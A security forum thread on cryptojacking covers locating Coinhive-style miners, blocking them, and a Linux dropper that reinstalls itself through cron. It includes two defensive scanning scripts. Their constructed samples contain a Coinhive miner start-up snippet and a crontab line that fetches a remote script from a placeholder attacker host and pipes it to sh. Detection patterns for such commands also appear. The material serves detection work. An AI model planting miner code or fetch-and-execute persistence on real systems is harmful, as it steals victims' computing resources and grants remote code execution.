finding cryptojacking malware with PublicWWW

Antivirus, forensics, intrusion detection, cryptography, etc.
labbe5
Posts: 2159
Joined: Wed 13 Nov 2013, 14:26
Location: Canada

finding cryptojacking malware with PublicWWW

#1 Post by labbe5 »

https://badpackets.net/how-to-find-cryp ... g-malware/

Cryptojacking malware continues to spread across the web, largely due to the popularity of Coinhive. Since Coinhive’s launch in September 2017, numerous cryptojacking clones have come about.

The tool I’ve chosen to locate them with is PublicWWW. This is a search engine that indexes the entire source code of websites.


Further reading:
https://badpackets.net/my-favorite-webs ... -services/
Cryptojacking detection was added to urlscan.io early in January 2018. This enables you check if a website is engaging in malicious cryptocurrency mining, based on known signatures of cryptojacking malware (JavaScript).
https://urlscan.io/
https://sitecheck.sucuri.net/
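The post mentions that urlscan.io flags pages based on known signatures of cryptojacking JavaScript. The script below is an added example (not code from the post, from badpackets.net or from urlscan.io) of what such a signature check looks like in miniature: it collects every script on a page and matches external URLs and inline bodies against a small indicator list. The indicator list is illustrative: the keywords are the miner names that appear in this thread, the API pattern is Coinhive's well-known constructor call, and the sample HTML (including its placeholder site key) is constructed for the example.

```python
"""Static scan of a web page's scripts for cryptojacking indicators.

Added example, not code from the forum post or the articles it links. It
mimics a signature-based checker at small scale: collect every <script>
on a page and match it against known miner hostnames, keywords and
JavaScript API calls.
"""
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Illustrative signature list, not a vendor ruleset. Keywords are the miner
# names named in the thread; the API pattern is Coinhive's constructor call.
MINER_HOSTS = ("coinhive.com",)
MINER_KEYWORDS = ("coinhive", "cryptonight", "xmrig")
MINER_API_PATTERNS = (
    ("CoinHive.Anonymous", re.compile(r"CoinHive\.Anonymous\s*\(")),
)


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # bodies of <script> elements without src
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def _indicators(text):
    """Return the sorted set of signature names that match `text`."""
    lowered = text.lower()
    hits = {kw for kw in MINER_KEYWORDS if kw in lowered}
    hits.update(name for name, rx in MINER_API_PATTERNS if rx.search(text))
    return sorted(hits)


def scan_html(html):
    """Return one finding per script that matches a miner signature."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        host = urlsplit(src).netloc.lower()   # works for https://, // and relative URLs
        hits = set(_indicators(src))
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            hits.add("host:" + host)
        if hits:
            findings.append({"kind": "external", "where": src, "indicators": sorted(hits)})
    for n, body in enumerate(collector.inline, start=1):
        hits = _indicators(body)
        if hits:
            findings.append({"kind": "inline", "where": f"inline script #{n}", "indicators": hits})
    return findings


# Constructed sample page: one benign external script, one miner library,
# one inline miner start-up and one benign inline script.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
<script>
  var miner = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
<script>console.log("benign");</script>
</body></html>"""

if __name__ == "__main__":
    # With a file argument scan that saved page; otherwise scan the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            page = fh.read()
    else:
        page = SAMPLE_HTML
    results = scan_html(page)
    for f in results:
        print(f"{f['kind']:8} {f['where']}: {', '.join(f['indicators'])}")
    if not results:
        print("no miner signatures found")
```

Run it against a saved copy of a page (`python scan.py page.html`). A match on the external script URL is the cheap, high-confidence case; the inline match matters because compromised sites often carry the miner start-up code directly in the page rather than only as a `src` reference, and string signatures miss obfuscated or renamed copies, which is why the article's author pairs them with CPU-usage observations.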

labbe5
Posts: 2159
Joined: Wed 13 Nov 2013, 14:26
Location: Canada

How to stop cryptojacking

#2 Post by labbe5 »

https://badpackets.net/how-to-stop-cryptojacking/

Cryptojacking is defined as hijacking your desktop/laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.

MinerBlock is an addon for Firefox and Chrome.

https://addons.mozilla.org/en-US/firefo ... ock-origin

Further reading:
https://www.guidingtech.com/block-crypt ... ng-firefox

labbe5
Posts: 2159
Joined: Wed 13 Nov 2013, 14:26
Location: Canada

Cryptominer Uses Cron To Reinfect Linux Host After Removal

#3 Post by labbe5 »

https://www.bleepingcomputer.com/news/s ... r-removal/

A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.

The malware was initially discovered on a web server with a maxed out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.

As Sucuri's security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials.


Linux targeted with coin miners

The Linux platform is getting more and more attention from cybercriminals as Check Point proved with the discovery of a Backdoor Trojan they dubbed SpeakUp that targets servers running six different Linux distributions to drop XMRig miners.

Another campaign detected by Trend Micro during February deployed the XMR-Stak Cryptonight cryptocurrency miner on Linux machines, at the same time hunting down and killing other Linux malware and coin miners present on computers it compromised.

Also, the Xbash botnet spotted by Palo Alto Networks' Unit 42 in September 2018 comes with self-spreading capabilities and it targets both Linux and Windows servers, combining cryptomining and ransomware capabilities.
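The post above describes a dropper that survives removal because a cron job re-downloads it. The script below is an added example (not code from the post, BleepingComputer or Sucuri) of how a responder can hunt for that kind of persistence: it parses crontab text, separates the schedule, optional user field and command, and flags entries whose command fetches-and-pipes into a shell, runs from a world-writable directory, decodes an embedded payload, or names a miner mentioned in the thread. The heuristics, the placeholder host `attacker.invalid` and the sample crontab are constructed for this example.

```python
"""Hunt crontab entries that look like cryptominer reinfection hooks.

Added example, not code from the forum post or the articles it links. It
parses crontab text and flags commands that match simple persistence
heuristics, then reports schedule, user and command for triage.
"""
import glob
import os
import re

# Heuristics applied to the command part of each entry. Constructed for this
# example; tune them to your environment to keep false positives down.
COMMAND_HEURISTICS = (
    ("download-and-execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("executes-from-tmp", re.compile(r"(?:^|[\s;|&(])(?:/tmp|/dev/shm|/var/tmp)/")),
    ("decodes-payload", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    ("known-miner-name", re.compile(r"xmrig|xmr-stak", re.IGNORECASE)),
)
FREQUENT_MINUTES = 5  # */5 or more often is typical of a re-download loop


def parse_crontab(text, system=False):
    """Yield (schedule, user, command); system crontabs carry a user field."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):   # SHELL=, PATH=, MAILTO=
            continue
        nsched = 1 if line.startswith("@") else 5         # @reboot etc. vs 5 fields
        nfields = nsched + (1 if system else 0)
        parts = line.split(None, nfields)
        if len(parts) <= nfields:
            continue                                      # malformed line, skip
        schedule = " ".join(parts[:nsched])
        user = parts[nsched] if system else None
        yield schedule, user, parts[nfields]


def _runs_frequently(schedule):
    """True for every-minute or */N (N <= FREQUENT_MINUTES) minute fields."""
    minute = schedule.split()[0]
    if minute == "*":
        return True
    m = re.fullmatch(r"\*/(\d+)", minute)
    return bool(m) and int(m.group(1)) <= FREQUENT_MINUTES


def hunt(text, source="crontab", system=False):
    """Return a finding dict for every entry that trips a command heuristic."""
    findings = []
    for schedule, user, command in parse_crontab(text, system):
        hits = [name for name, rx in COMMAND_HEURISTICS if rx.search(command)]
        if not hits:
            continue
        if _runs_frequently(schedule):
            hits.append("runs-every-few-minutes")
        findings.append({"source": source, "user": user, "schedule": schedule,
                         "command": command, "indicators": hits})
    return findings


# Constructed sample user crontab; attacker.invalid and the paths are placeholders.
SAMPLE_USER_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://attacker.invalid/x.sh | sh > /dev/null 2>&1
@reboot /dev/shm/.x/run.sh
15 2 * * 0 /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    # Live mode: read the usual crontab locations (spool dirs need root),
    # then append the constructed sample so the output shows what a hit looks like.
    targets = [("/etc/crontab", True)] + [(p, True) for p in glob.glob("/etc/cron.d/*")]
    targets += [(p, False) for d in ("/var/spool/cron/crontabs", "/var/spool/cron")
                for p in glob.glob(d + "/*")]
    found = []
    for path, is_system in targets:
        if not os.path.isfile(path):
            continue
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                found += hunt(fh.read(), source=path, system=is_system)
        except PermissionError:
            print(f"skipped {path}: permission denied")
    found += hunt(SAMPLE_USER_CRONTAB, source="constructed-sample")
    for f in found:
        print(f"{f['source']}: [{f['schedule']}] {f['command']}  <- {', '.join(f['indicators'])}")
```

Per-user crontabs (`/var/spool/cron/crontabs/` on Debian-derived systems, `/var/spool/cron/` on Red Hat-derived ones) have no user field, while `/etc/crontab` and `/etc/cron.d/*` do, so the parser must be told which format it is reading or the command column shifts by one word. When an entry is flagged, remove the cron entry and the dropped script together with the miner binary, or the host will simply be reinfected on the next run.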
